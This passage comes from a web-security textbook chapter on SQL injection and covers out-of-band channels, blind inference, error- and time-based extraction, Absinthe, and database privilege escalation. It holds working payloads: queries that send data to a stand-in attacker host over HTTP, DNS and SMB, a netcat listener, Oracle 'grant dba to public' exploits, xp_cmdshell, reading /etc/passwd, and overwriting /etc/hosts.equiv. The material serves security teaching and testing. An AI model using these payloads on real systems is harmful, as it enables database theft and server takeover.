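A scripted version of this technique is sketched below under stated assumptions: an in-memory SQLite database stands in for the target, SQLite's `unicode()` and `substr()` functions take the place of ASCII and SUBSTRING, and `numeric_probe` is a hypothetical stand-in for whatever request returns the number to you.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', '0wned')")


def numeric_probe(position):
    """Return the character code at a 1-based position, as a number."""
    row = conn.execute(
        "SELECT unicode(substr(password, ?, 1)) FROM users "
        "WHERE username = 'admin'",
        (position,),
    ).fetchone()
    return row[0]


def recover_string(probe, max_length=64):
    """Rebuild the string one character at a time from numeric responses."""
    characters = []
    for position in range(1, max_length + 1):
        code = probe(position)
        if not code:  # no character at this position: end of the string
            break
        characters.append(chr(code))
    return "".join(characters)


recovered = recover_string(numeric_probe)
print(recovered)
```

Each call to the probe corresponds to one request to the application, so a string of n characters costs n + 1 requests.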

TIP There are numerous subtle variations in the way different database

platforms handle string manipulation and numeric computation, which you may

need to take account of when performing advanced attacks of this kind. An

excellent guide to these differences covering many different databases can be

found here:

http://sqlzoo.net/howto/source/z.dir/i08fun.xml

In a variation on this situation, the authors have encountered cases in which

what is returned by the application is not an actual number, but some resource

for which that number is an identifier. The application performs a SQL query

based on user input, obtains a numeric identifier for a document, and then

returns the document’s contents to the user. In this situation, an attacker can

first obtain a copy of every document whose identifiers are within the relevant

numeric range and construct a mapping of document contents to identifiers.

Then, when performing the attack described previously, the attacker can con-

sult this map to determine the identifier for each document received from the

application, and thereby retrieve the ASCII value of the character that they

have successfully extracted.

Using an Out-of-Band Channel

In many cases of SQL injection, the application does not return the results of

any injected query to the user’s browser, nor does it return any error messages

generated by the database. In this situation, it may appear that your position is

futile: even if a SQL injection flaw exists, it surely cannot be exploited to extract

arbitrary data or perform any other action. This appearance is false, however,

and there are various techniques that you can use to retrieve data, and verify

that other malicious actions have been successful.

There are many circumstances in which you may be able to inject an arbitrary query but not retrieve its results. Recall the query performed by the vulnerable login function:

SELECT * FROM users WHERE username = ‘marcus’ and password = ‘secret’

In addition to modifying the logic of the query to bypass the login, you can

inject an entirely separate subquery using string concatenation to join its

results to the item you control. For example:

foo’ || (SELECT 1 FROM dual WHERE (SELECT username FROM all_users WHERE

username = ‘DBSNMP’) = ‘DBSNMP’)--

This will cause the application to perform the following query:

SELECT * FROM users WHERE username = ‘foo’ || (SELECT 1 FROM dual WHERE

(SELECT username FROM all_users WHERE username = ‘DBSNMP’) = ‘DBSNMP’)

The database will execute your arbitrary subquery, append its results to foo

and then look up the details of the resulting username. Of course, the login

will fail, but your injected query will have been executed. All you will receive

back in the application’s response is the standard login failure message. What

you then need is a means of retrieving the results of your injected query.

A different situation arises when you are able to employ batch queries

against MS-SQL databases. Batch queries are extremely useful, because they

allow you to execute an entirely separate statement over which you have full

control, using a different SQL verb and targeting a different table. However,

because of the way batch queries are carried out, the results of an injected


query cannot be directly retrieved. Again, you need a means of retrieving the

lost results of your injected query.

One method for retrieving data that is often effective in this situation is to

use an out-of-band channel. Having achieved the ability to execute arbitrary

SQL statements within the database, it is often possible to leverage some of the

database’s built-in functionality to create a network connection back to your

own computer, over which you can transmit arbitrary data that you have gath-

ered from the database.

The means of creating a suitable network connection are highly database-

dependent, and different methods may or may not be available given the priv-

ilege level of the database user with which the application is accessing the

database. Some of the most common and effective techniques for each type of

database are described here.

MS-SQL

The OpenRowSet command can be used to open a connection to an external database and insert arbitrary data into it. For example, the following query will cause the target database to open a connection to the attacker’s database and insert the version string of the target database into the table called foo:

insert into openrowset(‘SQLOLEDB’,

‘DRIVER={SQL Server};SERVER=wahh-attacker.com,80;UID=sa;PWD=letmein’,

‘select * from foo’) values (@@version)

Note that you can specify port 80, or any other likely value, to increase your

chance of making an outbound connection through any firewalls.

Oracle

Oracle contains a large amount of default functionality that is accessible by

low-privileged users and can be used to create an out-of-band connection.

The UTL_HTTP package can be used to make arbitrary HTTP requests to other hosts. UTL_HTTP contains rich functionality and supports proxy servers, cookies, redirects, and authentication. This means that an attacker who has compromised a database on a highly restricted internal corporate network may be able to leverage a corporate proxy to initiate outbound connections to the Internet.

In the following example, UTL_HTTP is used to transmit the results of an injected query to a server controlled by the attacker:

https://wahh-app.com/employees.asp?EmpNo=7521'||UTL_HTTP.request('wahh-attacker.com:80/'||(SELECT%20username%20FROM%20all_users%20WHERE%20ROWNUM%3d1))--


This URL causes UTL_HTTP to make a GET request for a URL containing the first username in the table all_users. The attacker can simply set up a netcat listener on wahh-attacker.com to receive the result:

C:\>nc -nLp 80

GET /SYS HTTP/1.1

Host: wahh-attacker.com

Connection: close
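Reading the transmitted value out of a captured request like the one above can be sketched in Python. This is a minimal illustration that works on a request already captured as text; the helper name extract_path_data is hypothetical, and the sample request simply mirrors the listener output shown.

```python
from urllib.parse import unquote

def extract_path_data(raw_request):
    """Return the URL-decoded path (minus the leading slash) from a raw HTTP request."""
    request_line = raw_request.split("\r\n", 1)[0]
    method, target, _version = request_line.split(" ", 2)
    if method != "GET":
        raise ValueError("expected a GET request")
    return unquote(target.lstrip("/"))

captured = "GET /SYS HTTP/1.1\r\nHost: wahh-attacker.com\r\nConnection: close\r\n\r\n"
value = extract_path_data(captured)
```

URL-decoding matters because query results containing spaces or punctuation may arrive percent-encoded in the path.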

The UTL_INADDR package is designed to be used to resolve host names to IP addresses. It can be used to generate arbitrary DNS queries to a server controlled by the attacker. In many situations, this is more likely to succeed than the UTL_HTTP attack because DNS traffic is often allowed out through corporate firewalls even when HTTP traffic is restricted. The attacker can leverage this package to perform a lookup on a hostname of their choice, effectively retrieving arbitrary data by prepending it as a subdomain to a domain name that they control, for example:

https://wahh-app.com/employees.asp?EmpNo=7521'||UTL_INADDR.GET_HOST_NAME((SELECT%20PASSWORD%20FROM%20DBA_USERS%20WHERE%20USERNAME='SYS')||'.wahh-attacker.com')

This results in a DNS query to the wahh-attacker.com name server containing the SYS user’s password hash:

DCB748A5BC5390F2.wahh-attacker.com
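Recovering the data from a logged DNS query name can be sketched as follows. This is an illustration under stated assumptions: the helper name extract_label_data is hypothetical, and the name is lowercased because DNS names are case-insensitive (harmless for a hexadecimal hash, but lossy for case-sensitive data).

```python
def extract_label_data(query_name, controlled_domain):
    """Return the labels that precede controlled_domain in a queried hostname."""
    name = query_name.rstrip(".").lower()
    suffix = "." + controlled_domain.rstrip(".").lower()
    if not name.endswith(suffix):
        return None  # query was for some other domain
    return name[: -len(suffix)]

MAX_LABEL = 63  # DNS limits each label to 63 octets (RFC 1035)

data = extract_label_data("DCB748A5BC5390F2.wahh-attacker.com", "wahh-attacker.com")
```

The 63-octet label limit means that longer values would need to be split across several lookups.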

The UTL_SMTP package can be used to send emails. This facility can be used to retrieve large volumes of data captured from the database by sending it in outbound emails.

The UTL_TCP package can be used to open arbitrary TCP sockets to send and receive network data.

MySQL

The SELECT ... INTO OUTFILE command can be used to direct the output from

an arbitrary query into a file. The specified filename may contain a UNC path,

enabling you to direct the output to a file on your own computer. For example:

select * into outfile ‘\\\\attacker\\share\\output.txt’ from users;

To receive the file, you will need to create an SMB share on your computer

that allows anonymous write access. You can configure shares on both Win-

dows and Unix-based platforms to behave in this way. If you have difficulty

receiving the exported file, this may well result from a configuration issue in

your SMB server. You can use a sniffer to confirm whether the target server is


initiating any inbound connections to your computer, and if so, consult your

server documentation to ensure it is correctly configured.

Leveraging the Operating System

It is often possible to perform escalation attacks via the database that result in execution of arbitrary commands on the operating system of the database server itself. In this situation, there are many more avenues available to you for retrieval of data, such as using built-in commands like tftp, mail, and telnet, or copying data into the web root for retrieval using a browser. See the later section “Beyond SQL Injection” for techniques for escalating privileges on the database itself.

Using Inference: Conditional Responses

There are many reasons why an out-of-band channel may not be available —

most commonly, because the database is located within a protected network

whose perimeter firewalls do not allow any outbound connections to the Inter-

net or any other network. In this situation, you are restricted to accessing the

database entirely via your injection point into the web application.

In this situation, working more or less blind, there are still techniques you

can use to retrieve arbitrary data from within the database. These techniques

are all based upon the concept of using an injected query to conditionally trig-

ger some detectable behavior by the database and then inferring a required

item of information on the basis of whether this behavior occurs.

This topic is a thriving area of current research into web application attack

techniques, and we will examine the very latest methods that have been

devised at the time of this writing.

Recall the vulnerable login function where the username and password

fields can be injected into to perform arbitrary queries:

SELECT * FROM users WHERE username = ‘marcus’ and password = ‘secret’

Suppose that you have not identified any method of transmitting the results

of your injected queries back to the browser. Nevertheless, you have already

seen how you can use SQL injection to modify the application’s behavior. For

example, submitting the following two pieces of input will cause very differ-

ent results:

admin’ AND 1=1--

admin’ AND 1=2--


In the first case, the application will log you in as the admin user. In the second case, the login attempt will fail, because the 1=2 condition is always false. You can leverage this control of the application’s behavior as a means of inferring the truth or falsehood of arbitrary conditions within the database itself. Using the ASCII and SUBSTRING functions described previously, you can test whether a specific character of a captured string has a specific value. For example, submitting this piece of input will log you in as the admin user, because the condition tested is true:

admin’ AND ASCII(SUBSTRING(‘Admin’,1,1)) = 65--

Submitting the following input, however, will result in a failed login,

because the condition tested is false:

admin’ AND ASCII(SUBSTRING(‘Admin’,1,1)) = 66--

By submitting a large number of such queries, cycling through the range of

likely ASCII codes for each character until a hit occurs, you can extract the

entire string, one byte at a time.
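The cycle-until-hit procedure can be sketched against a deliberately vulnerable login function running on a local in-memory SQLite database. Everything here is an assumption made for illustration: the table contents, the login function, and the helper names are hypothetical, and SQLite's unicode and substr stand in for ASCII and SUBSTRING.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'S3cret')")

def login(username, password):
    """Deliberately vulnerable: builds the query by string concatenation."""
    query = ("SELECT * FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None

def condition_is_true(condition):
    """Submit admin' AND <condition>-- and report whether the login succeeded."""
    return login("admin' AND " + condition + "--", "x")

def extract(expression, max_len=32):
    """Recover a string one character at a time by cycling through codes 32..126."""
    out = []
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            if condition_is_true(
                f"unicode(substr(({expression}),{pos},1)) = {code}"
            ):
                out.append(chr(code))
                break
        else:
            break  # no printable code matched: end of string
    return "".join(out)

recovered = extract("SELECT password FROM users WHERE username = 'admin'")
```

The only information that leaves the login function is a single true or false per request, yet the whole string is recovered; the cost is up to 95 requests per character in this linear form.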

Absinthe

Performing this inference-based attack manually would be extremely tedious

and time-consuming, requiring numerous requests for every single byte of

retrieved data. Fortunately, there are various ways in which you can automate

and parallelize the attack, to extract a large amount of information in a rela-

tively short period of time. An excellent tool that you can use to perform this

task is Absinthe.

Absinthe is not a point-and-click tool. To use it effectively, you need to fully

understand the SQL injection flaw you are exploiting, and have reached the

point where you can supply crafted input that affects the application’s

response in some detectable way.

The first step is to configure Absinthe with all the information required to

perform the attack. This includes:

■■ The URL and request method.

■■ The type of database being targeted, so that Absinthe can retrieve the relevant meta-information once the attack is underway.

■■ The parameters to the request, and whether each is injectable.

■■ Any further options to fine-tune the attack. If necessary, Absinthe can append a specified string at the end of each injected payload and can add the comment character, to ensure that the resulting modified query is syntactically valid.


A typical configuration is shown in Figure 9-1.

Figure 9-1: A typical Absinthe configuration

The next step is to click the Initialize Injection option. This causes Absinthe

to issue two test requests, designed to trigger different application responses.

As described in the previous attack, Absinthe injects the following two

payloads:

‘ AND 1=1--

‘ AND 1=2--

Provided that you have configured Absinthe correctly, the two test requests

should result in different responses from the application, confirming that you

are ready to exploit the vulnerability.


TIP Depending on the syntactic complexity of the query into which you are

injecting, your first connection test may or may not be successful in generating

different responses from the application. If it is not, then you need to fix up

the syntax of the query that Absinthe’s requests are generating, given your

understanding gained from your manual probing of the application. To modify

the syntax following Absinthe’s payload, you can change the Append Text to

End of Query option. To modify the syntax before the payload, you can change

the default value for the relevant parameter. Keep experimenting until the

Initialize Injection test is successful.

When you are satisfied that Absinthe has been correctly configured to

exploit the vulnerability, you can launch the attack. To do this, go to the DB

Schema tab and select one or more of the available actions: Retrieve Username,

Load Table Info, and Load Field Info.

Absinthe works by replacing the test 1=1 condition with a huge number of other conditions designed to discover the contents of the database and retrieve arbitrary data from it.

For example, if you are targeting the Oracle platform, Absinthe may dis-

cover the first character of the current database user’s username by injecting

values like the following:

admin’ AND (SELECT ASCII(SUBSTR(a.username,1,1)) FROM USER_USERS a WHERE

A.USERNAME = user) = 65

This condition will be true if the first character of the username is A. Absinthe will detect that it is true because the application’s response is identical to the original 1=1 response. By automating a large number of queries, Absinthe will retrieve the entire string.

In fact, rather than iterating through every possible character to find a hit,

Absinthe uses a more sophisticated binary chop technique, which dramatically

reduces the number of requests needed. This involves first testing whether the

queried character is higher than X, which is the middle value in the range of

allowed values. If so, the test is repeated for 1.5X; if not, it is repeated for 0.5X.

For example:

admin’ AND (SELECT ASCII(SUBSTR(a.username,1,1)) FROM USER_USERS a WHERE

A.USERNAME = user) > 19443--

admin’ AND (SELECT ASCII(SUBSTR(a.username,1,1)) FROM USER_USERS a WHERE

A.USERNAME = user) > 9722--

etc...

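In general, this method enables the value of the targeted character to be discovered in far fewer attempts: because each request halves the remaining range, a character drawn from N possible values is identified in roughly log2(N) requests rather than up to N.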
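The binary chop can be sketched in Python against a simulated target. This is not Absinthe's actual implementation; the oracle, the 0 to 127 range, and the function names are assumptions chosen to keep the example self-contained.

```python
def make_oracle(secret):
    """Simulated target: answers 'is the code of character pos greater than n?'."""
    calls = {"count": 0}
    def greater_than(pos, n):
        calls["count"] += 1
        return ord(secret[pos]) > n
    return greater_than, calls

def binary_chop(greater_than, pos, low=0, high=127):
    """Find the character code at pos in [low, high] by halving the range."""
    while low < high:
        mid = (low + high) // 2
        if greater_than(pos, mid):
            low = mid + 1   # code lies in the upper half
        else:
            high = mid      # code lies in the lower half (or equals mid)
    return low

greater_than, calls = make_oracle("SYSTEM")
recovered = "".join(chr(binary_chop(greater_than, i)) for i in range(6))
```

With 128 candidate values, every character costs exactly seven requests, compared with up to 128 when each value is tried in turn.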


Absinthe understands how to probe the metadata of each type of database,

as described earlier. This enables it to use the preceding simple steps to

retrieve any desired data from within the database, including the table and

column structure, and the actual data held within any given table. It presents

all of this information in a hierarchical tree format, as shown in Figure 9-2.

Figure 9-2: Absinthe results showing the table structure within

the database

When Absinthe has gathered all of the data that you require, you can even

export the captured information in XML format, by going to the Download

Records tab. For example:

<LOGIN>admin</LOGIN>

</DataRecord>


<PASSWORD>gameover</PASSWORD>

<LOGIN>maniscprout</LOGIN>

</DataRecord>

</datatable>

</AbsinthedatabasePull>

Inducing Conditional Errors

In the preceding example, the application contained some prominent func-

tionality whose logic could be directly controlled by injecting into an existing

SQL query. The designed behavior of the application (a successful versus a

failed login) could be hijacked to return a single item of information to the

attacker. However, not all situations are this straightforward. In some cases,

you may be injecting into a query that has no noticeable effect on the applica-

tion’s behavior, such as a logging mechanism. In other cases, you may be

injecting a subquery or a batched query whose results are not processed by the

application in any way. In this situation, you may struggle to find a way of

causing a detectable difference in behavior that is contingent on a specified

condition.

David Litchfield devised a technique that can be used to trigger a detectable

difference in behavior in most circumstances. The core idea is to inject a query

that induces a database error contingent upon some specified condition. When

a database error occurs, this will often be externally detectable, either through

an HTTP 500 response code, or through some kind of error message or anom-

alous behavior (even if the error message itself does not disclose any useful

information).

The technique relies upon a feature of database behavior when evaluating conditional statements: the database only evaluates those parts of the statement that need to be evaluated given the status of other parts. An example of this behavior is a SELECT statement containing a WHERE clause:

SELECT X FROM Y WHERE C

This causes the database to work through each row of table Y, evaluating condition C, and returning X in those cases where condition C is true. If condition C is never true, then the expression X is never evaluated.

This behavior can be exploited by finding an expression X that is syntactically valid but that generates an error if it is ever evaluated. An example of such an expression in Oracle and MS-SQL is a divide-by-zero computation, such as 1/0. If condition C is ever true, then expression X will be evaluated, causing a database error. If condition C is always false, then no error will be generated. You can, therefore, use the presence or absence of an error to test an arbitrary condition.


An example of this is the following query, which tests whether the default Oracle user DBSNMP exists. If this user exists, then the expression 1/0 is evaluated, causing an error:

SELECT 1/0 FROM dual WHERE (SELECT username FROM all_users WHERE

username = ‘DBSNMP’) = ‘DBSNMP’

The following query tests whether an invented user AAAAAA exists. Because the WHERE condition is never true, the expression 1/0 is not evaluated, and so no error occurs:

SELECT 1/0 FROM dual WHERE (SELECT username FROM all_users WHERE

username = ‘AAAAAA’) = ‘AAAAAA’

What this technique achieves is a way of inducing a conditional response

within the application, even in cases where the query you are injecting has no

impact on the application’s logic or data processing. It, therefore, enables you to use the inference techniques described previously to extract data in a very wide range of situations. Further, because the technique is so simple, the same attack strings will work on a range of databases, and at injection points within various types of SQL statement.
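The evaluation behavior that this technique depends on can be modeled with a toy example in Python. This is a model of the idea rather than a database: the select function and the sample rows are hypothetical, and Python's ZeroDivisionError stands in for the database error. (SQLite is not used here because it returns NULL for 1/0 instead of raising an error.)

```python
def select(expr, rows, condition):
    """Toy model of SELECT expr FROM rows WHERE condition: expr runs only for matching rows."""
    return [expr(row) for row in rows if condition(row)]

def divide_by_zero(_row):
    return 1 / 0  # raises ZeroDivisionError, standing in for the database error

def condition_holds(rows, condition):
    """Infer whether condition is true for any row from the presence of an error."""
    try:
        select(divide_by_zero, rows, condition)
    except ZeroDivisionError:
        return True   # the expression was evaluated, so some row matched
    return False      # no row matched, so the expression never ran

all_users = [{"username": "SYS"}, {"username": "DBSNMP"}]
dbsnmp_exists = condition_holds(all_users, lambda r: r["username"] == "DBSNMP")
aaaaaa_exists = condition_holds(all_users, lambda r: r["username"] == "AAAAAA")
```

The caller never sees any query output; the presence or absence of the error is the only signal, which is exactly the single bit that the inference techniques need.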

Using Time Delays

Despite all of the sophisticated techniques already described, there may yet be

situations in which none of these tricks are effective. In some cases, you may

be able to inject a query that returns no results to the browser, cannot be used

to open an out-of-band channel, and that has no effect on the application’s

behavior, even if it induces an error within the database itself.

In this situation, all is not lost, thanks to a technique invented by Chris

Anley and Sherief Hammad of NGSSoftware. They devised a way of crafting

a query that would cause a time delay, contingent upon some condition speci-

fied by the attacker. The attacker can submit his query, and then monitor the

time taken for the server to respond. If a delay occurs, then the attacker may

infer that the condition is true. Even if the actual content of the application’s

response is identical in the two cases, the presence or absence of a time delay

enables the attacker to extract a single bit of information from the database. By

performing numerous such queries, the attacker can systematically retrieve

arbitrarily complex data from the database, one bit at a time.
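The timing inference can be sketched in Python using a simulated target. The delay length, the threshold, and the function names are assumptions for the demonstration; against a real network, jitter would usually call for a longer delay and repeated measurements.

```python
import time

DELAY = 0.2       # simulated delay in seconds (an assumption for the demo)
THRESHOLD = 0.1   # responses slower than this are treated as "delayed"

def simulated_request(condition_true):
    """Stand-in for the target: pauses only when the injected condition holds."""
    if condition_true:
        time.sleep(DELAY)
    return "identical response body"

def infer_bit(condition_true):
    """Return True if the response took long enough to indicate a delay."""
    start = time.monotonic()
    simulated_request(condition_true)
    elapsed = time.monotonic() - start
    return elapsed > THRESHOLD

bit_when_true = infer_bit(True)
bit_when_false = infer_bit(False)
```

The response body is the same in both cases; only the elapsed time distinguishes them.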

The precise means of inducing a suitable time delay depends upon the target database being used. MS-SQL contains a built-in WAITFOR command, which can be used to cause a specified time delay. For example, the following query will cause a time delay of 5 seconds if the current database user is sa:

if (select user) = ‘sa’ waitfor delay ‘0:0:5’


Equipped with this command, the attacker can retrieve arbitrary informa-

tion in various ways. One method is to leverage the same technique already

described for the case where the application returns conditional responses.

Now, instead of triggering a different application response when a particular

condition is detected, the injected query instead induces a time delay. For

example, the second of these queries will cause a time delay, indicating that the

first letter of the captured string is A:

if ASCII(SUBSTRING(‘Admin’,1,1)) = 64 waitfor delay ‘0:0:5’

if ASCII(SUBSTRING(‘Admin’,1,1)) = 65 waitfor delay ‘0:0:5’

As before, the attacker can cycle through all possible values for each character until a time delay occurs. Alternatively, the attack could be made more efficient by reducing the number of requests needed. In addition to the binary chop technique described previously for Absinthe, another approach is to break each byte of data down into individual bits and retrieve each bit in a single query. The POWER command and the bitwise AND operator & can be used to specify conditions on a bit-by-bit basis. For example, the following query will test the first bit of the first byte of the captured data, and pause if it is 1:

if (ASCII(SUBSTRING(‘Admin’,1,1)) & (POWER(2,0))) > 0 waitfor delay

‘0:0:5’

The following query will perform the same test on the second bit:

if (ASCII(SUBSTRING(‘Admin’,1,1)) & (POWER(2,1))) > 0 waitfor delay

‘0:0:5’
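The bit-by-bit approach can be sketched in Python with a simulated target. The oracle here answers directly instead of through a time delay, and the function names are hypothetical; the masks play the same role as POWER(2,n) in the queries above.

```python
def make_bit_oracle(secret):
    """Simulated target: answers whether (code of character pos) & mask is non-zero."""
    def bit_is_set(pos, mask):
        return (ord(secret[pos]) & mask) > 0
    return bit_is_set

def read_byte(bit_is_set, pos):
    """Rebuild one byte from eight independent single-bit questions."""
    value = 0
    for bit in range(8):
        mask = 2 ** bit          # same role as POWER(2, bit) in the queries above
        if bit_is_set(pos, mask):
            value |= mask
    return value

bit_is_set = make_bit_oracle("Admin")
first = read_byte(bit_is_set, 0)
recovered = "".join(chr(read_byte(bit_is_set, i)) for i in range(5))
```

Because the eight questions for a byte do not depend on one another's answers, they can be issued in parallel, which is not possible with a binary chop.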

As mentioned earlier, the means of inducing a time delay are highly database-

dependent. Other databases do not contain a built-in time-delay command;

however, you can easily use other tricks to cause a time delay to occur.

In MySQL, the benchmark function can be used to perform a specified

action repeatedly. Instructing the database to perform a processor-intensive

action, such as a SHA-1 hash, a large number of times will result in a measur-

able time delay. For example:

select if(user() like 'root@%', benchmark(50000,sha1('test')), 'false')

In Oracle, one trick is to use UTL_HTTP to connect to a nonexistent server. The database will attempt to connect to the specified server and eventually time out. For example:

SELECT ‘a’||Utl_Http.request(‘http://madeupserver.com’) from dual

...delay...

ORA-29273: HTTP request failed

ORA-06512: at “SYS.UTL_HTTP”, line 1556

ORA-12545: Connect failed because target host or object does not exist


You can leverage this behavior to cause a time delay contingent on some condition that you specify. For example, the following query will cause a timeout if the default Oracle account DBSNMP exists:

SELECT ‘a’||Utl_Http.request(‘http://madeupserver.com’) FROM dual WHERE

(SELECT username FROM all_users WHERE username = ‘DBSNMP’) = ‘DBSNMP’

In both Oracle and MySQL databases, you can use the SUBSTR(ING) and ASCII functions to retrieve arbitrary information one byte at a time, as described previously.

TIP We have described the use of time delays as a means of extracting

interesting information. However, the time-delay technique can also be

immensely useful when performing initial probing of an application to detect

SQL injection vulnerabilities. In some cases of completely blind SQL injection,

where no results are returned to the browser and all errors are handled

invisibly, the vulnerability itself may be very hard to detect using standard

techniques based on supplying crafted input. In this situation, using time delays

is often the most reliable way of detecting the presence of a vulnerability

during initial probing. For example, if the back-end database is MS-SQL, then

you can inject each of the following strings into each request parameter in turn,

and monitor the time taken for the application to respond to identify any

vulnerabilities:

'; waitfor delay '0:0:30'--

1; waitfor delay '0:0:30'--

Beyond SQL Injection: Escalating the Database Attack

A successful exploit of a SQL injection vulnerability very often results in total

compromise of all application data. Most applications employ a single account

for all database access and rely upon application-layer controls to enforce seg-

regation of access between different users. Gaining unrestricted use of the

application’s database account results in access to all of its data.

You may suppose, therefore, that owning all of the application’s data is the

finishing point of a SQL injection attack. However, there are many reasons

why it might be productive to advance your attack further, either by exploiting

a vulnerability within the database itself, or by harnessing some of its built-in

functionality to achieve your objectives. Further attacks that can be performed

by escalating the database attack include the following:

■■ If the database is shared with other applications, you may be able to escalate privileges within the database and gain access to other applications’ data.

■■ You may be able to compromise the operating system of the database server.

■■ You may be able to gain network access to other systems. Typically, the database server is hosted on a protected network behind several layers of network perimeter defenses. From the database server, you may be in a trusted position and be able to reach key services on other hosts, which may be further exploitable.

■■ You may be able to make network connections back out of the hosting infrastructure to your own computer. This may enable you to bypass the application altogether, easily transmitting large amounts of sensitive data gathered from the database, and often evading many intrusion detection systems.

■■ You may be able to extend the database’s existing functionality in arbitrary ways by creating user-defined functions. In some situations, this may enable you to circumvent hardening that has been performed on the database, by effectively re-implementing functionality that has been removed or disabled. There is a method for doing this in each of the mainstream databases, provided that you have gained database administrator (DBA) privileges.

COMMON MYTH Many database administrators assume that it is not

necessary to defend the database against attacks that require authentication to

exploit. They may reason that the database is accessed by only a trusted

application that is owned by the same organization. This ignores the possibility

that a flaw within the application may enable a malicious third party to interact

with the database within the security context of the application. Each of the

possible attacks just described should illustrate why databases need to be

defended against authenticated attackers.

Attacking databases is a huge topic, which is beyond the scope of this book.

In this section, we will point you towards a few key ways in which vulnerabil-

ities and functionality within the main database types can be leveraged to

escalate your attack. The key conclusion to draw is that every database con-

tains ways of escalating privileges. Applying current security patches and

robust hardening can help to mitigate many of these attacks, but not all of

them. For further reading on this highly fruitful area of current research, we

recommend The Database Hacker’s Handbook (Wiley, 2005).

MS-SQL

Perhaps the most notorious piece of database functionality that an attacker can misuse is the xp_cmdshell stored procedure, which is built into MS-SQL by default. This stored procedure allows users with DBA permissions to execute operating system commands in the same way as the cmd.exe command prompt. For example:

master..xp_cmdshell ‘ipconfig > foo.txt’

The scope for an attacker to misuse this functionality is huge. They can perform arbitrary commands, pipe the results to local files, and read them back. They can open out-of-band network connections back to themselves and create a backdoor command and communications channel, copying data from the server and uploading attack tools. Because MS-SQL runs by default as LocalSystem, the attacker can typically fully compromise the underlying operating system, performing arbitrary actions. There is a wealth of other extended stored procedures within MS-SQL, such as xp_regread or xp_regwrite, that can be used to perform powerful actions.

Not every database account will have permissions to use these built-in stored procedures, and in some cases the application uses a low-privileged account that does not have the required permissions. However, it is extremely common for applications to be using the all-powerful sa account, because administrators assume that the application is trusted not to abuse the database.

The OpenRowSet command can be leveraged to perform a port scan of any local or remote network. If the specified port on the target IP address is open, the database will attempt to connect, and eventually time out; otherwise, it will fail immediately. You can, therefore, use time delays to infer the status of ports that you cannot reach directly:

select * from OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=foobar;Network=DBMSSOCN

;Address=192.168.0.1,80;timeout=5’, ‘’)

This command can also be used to perform other attacks:

■■ You can try to connect to other databases and guess usernames and passwords (for example, the common sa account with a blank password).

■■ You can connect back to the local host and attempt to guess the password to the sa account. In some situations, administrators assign a weak password to this account in the belief that the database server is firewalled and so no attacker will be able to connect. You can circumvent this restriction because you are connecting directly from the server itself.

■■ Sometimes, if Windows-integrated authentication is in use, and multiple databases are configured with the same credentials, you may be able to authenticate transparently from one database to another without supplying any credentials.


Oracle

A huge number of security vulnerabilities have been found within the Oracle

database software itself. If you have found an SQL injection vulnerability that

enables you to perform arbitrary queries, then you can typically escalate to

DBA privileges by exploiting one of these vulnerabilities.

Oracle contains many built-in stored procedures that execute with DBA privileges and have been found to contain SQL injection flaws within the procedures themselves. One example of such a flaw existed in the default package SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES prior to the July 2006 critical patch update. This can be exploited to escalate privileges by injecting the query grant DBA to public into the vulnerable field:

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘INDX’,’SCH’,’T

EXTINDEXMETHODS”.ODCIIndexUtilCleanup(:p1); execute immediate ‘’declare

pragma autonomous_transaction; begin execute immediate ‘’‘’grant dba to

public’‘’‘ ; end;’‘; END;--‘,’CTXSYS’,1,‘1’,0) from dual

This type of attack could be delivered via a SQL injection flaw in a web

application by injecting the function into the vulnerable parameter.

Many other types of flaws have affected built-in components of Oracle. One example is the CTXSYS.DRILOAD.VALIDATE_STMT function. The purpose of this function is to test that a specified string contains a valid SQL statement. However, in earlier versions of Oracle, in the course of validating the supplied statement the function actually executed it! This meant that any user could execute any statement as DBA, simply by passing it to this function. For example:

exec CTXSYS.DRILOAD.VALIDATE_STMT(‘GRANT DBA TO PUBLIC’)

In addition to actual vulnerabilities like these, Oracle also contains a large amount of default functionality that is accessible by low-privileged users and can be used to perform undesirable actions, such as initiating network connections or accessing the file system. In addition to the powerful packages already described for creating out-of-band connections, the package UTL_FILE can be used to read from and write to files on the database server file system.

See The Oracle Hacker’s Handbook by David Litchfield (Wiley, 2007) for more

detail on escalating privileges within Oracle.

MySQL

Compared to the other databases covered, MySQL contains relatively little built-in functionality that can be misused by an attacker. One example is the ability of any user with the FILE_PRIV permission to read and write to the file system.

The LOAD_FILE command can be used to retrieve the contents of any file. For example:

select load_file('/etc/passwd')

The SELECT ... INTO OUTFILE command can be used to pipe the results of any query into a file. For example:

create table test (a varchar(200));
insert into test(a) values ('+ +');
select * from test into outfile '/etc/hosts.equiv';

In addition to reading and writing key operating system files, this capability

can also be used to perform other attacks:

■■

Because MySQL stores its data in plaintext files, to which the database must have read access, an attacker with FILE_PRIV permissions can simply open the relevant file and read arbitrary data from within the database, bypassing any access controls enforced within the database itself.

■■

MySQL enables users to create user-defined functions (UDFs) by calling out to a compiled library file that contains the function’s implementation. This file must be located within the normal path from which MySQL loads dynamic libraries. An attacker can use the preceding method to create an arbitrary binary file within this path and then create a UDF that uses it. See Chris Anley’s paper “Hackproofing MySQL” for more details of this technique.

SQL Syntax and Error Reference

We have described numerous techniques that enable you to probe for and exploit SQL injection vulnerabilities in web applications. In many cases, there are minor differences between the syntax that you need to employ against different back-end database platforms. Further, every database produces different error messages whose meaning you need to understand both when probing for flaws and when attempting to craft an effective exploit. The following pages contain a brief cheat sheet that you can use to look up the exact syntax you need for a particular task, and to decipher any unfamiliar error messages that you encounter.


SQL Syntax

Requirement: ASCII and SUBSTRING

Oracle: ASCII('A') is equal to 65

SUBSTR('ABCDE',2,3) is equal to BCD

MS-SQL: ASCII('A') is equal to 65

SUBSTRING('ABCDE',2,3) is equal to BCD

MySQL: ASCII('A') is equal to 65

SUBSTRING('ABCDE',2,3) is equal to BCD

Requirement: Retrieve current database user

Oracle: Select Sys.login_user from dual

SELECT user FROM dual

SYS_CONTEXT('USERENV','SESSION_USER')

MS-SQL: select user

select suser_sname()

MySQL: SELECT user()

